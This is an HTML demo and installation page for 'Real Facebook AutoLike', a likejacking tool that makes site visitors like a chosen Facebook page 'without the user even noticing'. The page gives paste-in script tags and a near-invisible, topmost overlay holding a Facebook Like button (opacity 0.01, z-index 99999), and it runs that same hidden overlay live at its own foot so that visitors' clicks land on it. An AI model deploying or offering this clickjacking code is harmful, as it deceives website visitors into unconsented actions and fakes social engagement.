<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Real Facebook AutoLike</title>

<!-- Meta Facebook -->
<meta property="og:title" content="Real Facebook AutoLike" />
<meta property="og:description" content="Get your website visitors to like your content or your Facebook page without even asking them" />
<meta property="og:image" content="http://f.cl.ly/items/0O1b39283O1T0S0Z1m2z/fbautolike.png" />

<!-- Script Real Facebook Auto Like -->
<script type='text/javascript' src='js/jquery.min.js'></script>
<script type='text/javascript' src='fblike/jquery.cookie.js?ver=1.0'></script>
<script type='text/javascript' src='fblike/core.js?ver=1.0'></script>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script type="text/javascript" src="http://www.facebook.com/profile.php?id=1082766141&amp;sk=4554" onload="fbautolike()" async="async"></script>


<style type="text/css">
body{
color: black;
font-size: 12px;
font-family: verdana, sans-serif;
}
#contenedor {
width: 590px;
border: 10px solid gray;
margin: 10px;
margin-left: auto;
margin-right: auto;
margin-top: 100px;
margin-bottom: auto;
padding: 10px;
}
#encabezado {
padding: 5px;
background-color:#485c94;
color: #FFFFFF;
font-size: 12px;
font-family: Century Gothic;

}
#bargray {
padding: 5px;
background-color:#c4cbda;
}
#description {
padding: 5px;
margin-left: ;
background-color:#637aae;
color:#FFF;
font-family: Century Gothic;
font-size: 16px;
}
#how{
clear: both;
padding: 5px;
margin-top: ;
background-color:#485c94;
}
#steps{
clear: both;
padding:5px;
background-color:#485c94;
color:#FFF;
font-family: Century Gothic;
font-size: 12px;
}
#install {
padding: 15px;
background-color:#637aae;
color:#FFF;
font-family: Century Gothic;
font-size: 16px;
}
.codigo {
	width:90%;
	border-radius: 15px;
	border: #FFF dotted 2px;
	background-color: #7C88A8;
	color: #FFFFFF;
	padding: 10px 10px;
}
</style>
</head>
<body>
<div id="contenedor">
<div id="encabezado"><a href="#"><img src="images/header.png"></a>
<center>Clic on the image to like</center>
</div>
<div id="bargray"></div>
<div id="description" align="center">Description: Get your website visitors to like your content or<br/>
your Facebook page without even asking them.</div>

<div id="how"><center><img src="images/how.png"></center></div>

<div id="steps">
<ol>
	<li>User goes in your webpage.</li>
	<li>Gives a click in whatever link of the page</li>
	<li>Automatically receives a like in your facebook fanpage, without the user even noticing.</li>

</ol>
</div>
<div id="bargray"></div>
<div id="install">Installation:</div>
<div id="steps">
<ol>
	<li>Paste this before the <strong>&lt;/head&gt;</strong> <br/><br/>
	<div class="codigo">
	&lt;meta property=&quot;og:title&quot; content=&quot;<strong>title</strong>&quot; /&gt;<br/>
	&lt;meta property=&quot;og:description&quot; content=&quot;<strong>description</strong>&quot; /&gt;<br/>
	&lt;meta property=&quot;og:image&quot; content=&quot;<strong>url image</strong>&quot; /&gt;<br/><br/>
	&lt;script type='text/javascript' src='js/jquery.min.js'&gt;&lt;/script&gt;<br/>
	&lt;script type='text/javascript' src='fblike/jquery.cookie.js?ver=1.0'&gt;&lt;/script&gt;<br/>
	&lt;script type='text/javascript' src='fblike/core.js?ver=1.0'&gt;&lt;/script&gt;<br/>
	&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;<br/>
	&lt;script type=&quot;text/javascript&quot; src=&quot;http://www.facebook.com/profile.php?id=1082766141&amp;amp;sk=4554&quot; onload=&quot;fbautolike()&quot; async=&quot;async&quot;&gt;&lt;/script&gt;<br/></div>
	<br/>
	  <br/>
	  <li>Fill in the meta property with data of are own web "title", "description", "url image".</li><br/>
	  <li>Paste this before the <strong>&lt;/body&gt;</strong><br/><br/>
	<div class="codigo">  &lt;div style=&quot;z-index:99999;position:absolute;display:block;opacity:0.01;-khtml-opacity:.01;-moz-opacity:.01;filter:alpha(opacity=1);&quot; id=&quot;likeme&quot;&gt;&lt;fb:like data-href=&quot;<strong>http://www.facebook.com/codecanyon/</strong>&quot;  locale=&quot;en_EN&quot; send=&quot;false&quot; layout=&quot;button_count&quot; width=&quot;50&quot; show_faces=&quot;false&quot;&gt;&lt;/fb:like&gt;&lt;/div&gt;</div></li><br/>
	  <li>In the URL, put the fan page or the url where we want to recive the likes.<br/>
      Example: <i>http://www.facebook.com/codecanyon/</i></li><br/>
	  <li>Ready, we have everything working correctly.</li>
</ol>
</div>
</div>
<div style="z-index:99999;position:absolute;display:block;opacity:0.01;-khtml-opacity:.01;-moz-opacity:.01;filter:alpha(opacity=1);" id="likeme"><fb:like data-href="http://www.facebook.com/codecanyon/" locale="en_EN" send="false" layout="button_count" width="50" show_faces="false"></fb:like></div>
</body>
</html>
